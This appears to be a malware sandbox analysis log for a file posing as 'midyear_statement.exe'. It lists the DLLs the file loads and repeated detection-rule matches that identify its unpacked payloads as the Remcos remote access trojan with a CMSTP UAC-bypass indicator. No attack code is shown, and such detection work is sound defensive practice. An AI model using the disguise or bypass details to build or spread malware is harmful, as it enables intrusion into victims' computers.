                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???y.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???y.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???y.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ????.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???2.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ???.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??????s.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: winhttpcom.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: webio.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: schannel.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: mskeyprotect.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ntasn1.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ncrypt.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\midyear_statement.exe Section loaded: ??.dll
                      Source: midyear_statement.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.5919e2.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.590000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.24140000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.12330000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.12330000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.24140000.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.5919e2.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.590000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.590000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.4f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.590000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.4f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000021.00000002.1638276893.0000000000590000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000001F.00000002.1589395937.0000000024140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
